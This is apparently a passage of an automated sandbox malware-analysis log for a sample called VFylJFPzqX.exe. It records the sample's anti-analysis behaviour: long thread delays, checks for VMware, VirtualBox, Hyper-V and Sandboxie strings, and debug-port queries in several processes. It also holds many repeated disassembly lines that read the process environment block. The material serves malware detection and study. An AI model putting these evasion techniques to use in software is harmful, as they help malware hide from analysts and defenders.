          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000002.2364455621.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
          Source: VFylJFPzqX.exe, 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, VFylJFPzqX.exe, 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
          Source: explorer.exe, 00000010.00000003.2379225682.00000000091C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: VFylJFPzqX.exe, 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
          Source: explorer.exe, 00000010.00000003.2375541043.0000000004FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}PO
          Source: explorer.exe, 00000010.00000002.2676388545.000000000954C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00+# cp
          Source: explorer.exe, 00000010.00000002.2676388545.0000000009194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdWndClassiverStore\en\volume.inf_loc
          Source: explorer.exe, 00000010.00000002.2670266703.0000000004FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000010.00000003.2490095914.000000000C9AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
          Source: explorer.exe, 00000004.00000002.2363894406.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2438311102.00000000092D2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000941B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.00000000093CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000N%\
          Source: explorer.exe, 00000010.00000003.2491757519.000000000C9EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963H
          Source: explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000010.00000002.2676388545.0000000009465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000=
          Source: explorer.exe, 00000010.00000002.2670266703.0000000004FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
          Source: explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
          Source: explorer.exe, 00000010.00000003.2516098392.000000000C9C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963H
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}t
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{~2e
          Source: explorer.exe, 00000010.00000002.2660398665.0000000001321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTerVMWare
          Source: explorer.exe, 00000010.00000002.2676388545.0000000009194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
          Source: explorer.exe, 00000010.00000003.2375541043.0000000004FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
          Source: explorer.exe, 00000010.00000002.2676388545.000000000954C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000010.00000003.2516098392.000000000C9C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\9507et
          Source: explorer.exe, 00000010.00000002.2676388545.0000000009194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000-
          Source: explorer.exe, 00000010.00000002.2683122014.000000000C8DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}-
          Source: explorer.exe, 00000010.00000002.2660398665.0000000001321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000010.00000002.2683122014.000000000C8DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\0
          Source: explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01800185 mov eax, dword ptr fs:[00000030h]3_2_01800185
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01864180 mov eax, dword ptr fs:[00000030h]3_2_01864180
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01864180 mov eax, dword ptr fs:[00000030h]3_2_01864180
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187C188 mov eax, dword ptr fs:[00000030h]3_2_0187C188
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187C188 mov eax, dword ptr fs:[00000030h]3_2_0187C188
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184019F mov eax, dword ptr fs:[00000030h]3_2_0184019F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6154 mov eax, dword ptr fs:[00000030h]3_2_017C6154
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6154 mov eax, dword ptr fs:[00000030h]3_2_017C6154
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BC156 mov eax, dword ptr fs:[00000030h]3_2_017BC156
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018861C3 mov eax, dword ptr fs:[00000030h]3_2_018861C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018861C3 mov eax, dword ptr fs:[00000030h]3_2_018861C3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0183E1D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F0124 mov eax, dword ptr fs:[00000030h]3_2_017F0124
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018961E5 mov eax, dword ptr fs:[00000030h]3_2_018961E5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F01F8 mov eax, dword ptr fs:[00000030h]3_2_017F01F8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov eax, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov ecx, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov eax, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov eax, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov ecx, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov eax, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov eax, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov ecx, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov eax, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E10E mov ecx, dword ptr fs:[00000030h]3_2_0186E10E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01880115 mov eax, dword ptr fs:[00000030h]3_2_01880115
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186A118 mov ecx, dword ptr fs:[00000030h]3_2_0186A118
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186A118 mov eax, dword ptr fs:[00000030h]3_2_0186A118
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186A118 mov eax, dword ptr fs:[00000030h]3_2_0186A118
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186A118 mov eax, dword ptr fs:[00000030h]3_2_0186A118
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01854144 mov ecx, dword ptr fs:[00000030h]3_2_01854144
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01858158 mov eax, dword ptr fs:[00000030h]3_2_01858158
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BA197 mov eax, dword ptr fs:[00000030h]3_2_017BA197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BA197 mov eax, dword ptr fs:[00000030h]3_2_017BA197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BA197 mov eax, dword ptr fs:[00000030h]3_2_017BA197
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EC073 mov eax, dword ptr fs:[00000030h]3_2_017EC073
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C2050 mov eax, dword ptr fs:[00000030h]3_2_017C2050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018580A8 mov eax, dword ptr fs:[00000030h]3_2_018580A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018860B8 mov eax, dword ptr fs:[00000030h]3_2_018860B8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018860B8 mov ecx, dword ptr fs:[00000030h]3_2_018860B8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018420DE mov eax, dword ptr fs:[00000030h]3_2_018420DE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BA020 mov eax, dword ptr fs:[00000030h]3_2_017BA020
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BC020 mov eax, dword ptr fs:[00000030h]3_2_017BC020
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018460E0 mov eax, dword ptr fs:[00000030h]3_2_018460E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018020F0 mov ecx, dword ptr fs:[00000030h]3_2_018020F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01844000 mov ecx, dword ptr fs:[00000030h]3_2_01844000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BC0F0 mov eax, dword ptr fs:[00000030h]3_2_017BC0F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C80E9 mov eax, dword ptr fs:[00000030h]3_2_017C80E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BA0E3 mov ecx, dword ptr fs:[00000030h]3_2_017BA0E3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856030 mov eax, dword ptr fs:[00000030h]3_2_01856030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01846050 mov eax, dword ptr fs:[00000030h]3_2_01846050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C208A mov eax, dword ptr fs:[00000030h]3_2_017C208A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018463C0 mov eax, dword ptr fs:[00000030h]3_2_018463C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187C3CD mov eax, dword ptr fs:[00000030h]3_2_0187C3CD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018643D4 mov eax, dword ptr fs:[00000030h]3_2_018643D4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018643D4 mov eax, dword ptr fs:[00000030h]3_2_018643D4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E3DB mov eax, dword ptr fs:[00000030h]3_2_0186E3DB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E3DB mov eax, dword ptr fs:[00000030h]3_2_0186E3DB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E3DB mov ecx, dword ptr fs:[00000030h]3_2_0186E3DB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186E3DB mov eax, dword ptr fs:[00000030h]3_2_0186E3DB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BC310 mov ecx, dword ptr fs:[00000030h]3_2_017BC310
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E0310 mov ecx, dword ptr fs:[00000030h]3_2_017E0310
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA30B mov eax, dword ptr fs:[00000030h]3_2_017FA30B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA30B mov eax, dword ptr fs:[00000030h]3_2_017FA30B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA30B mov eax, dword ptr fs:[00000030h]3_2_017FA30B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F63FF mov eax, dword ptr fs:[00000030h]3_2_017F63FF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE3F0 mov eax, dword ptr fs:[00000030h]3_2_017DE3F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE3F0 mov eax, dword ptr fs:[00000030h]3_2_017DE3F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE3F0 mov eax, dword ptr fs:[00000030h]3_2_017DE3F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
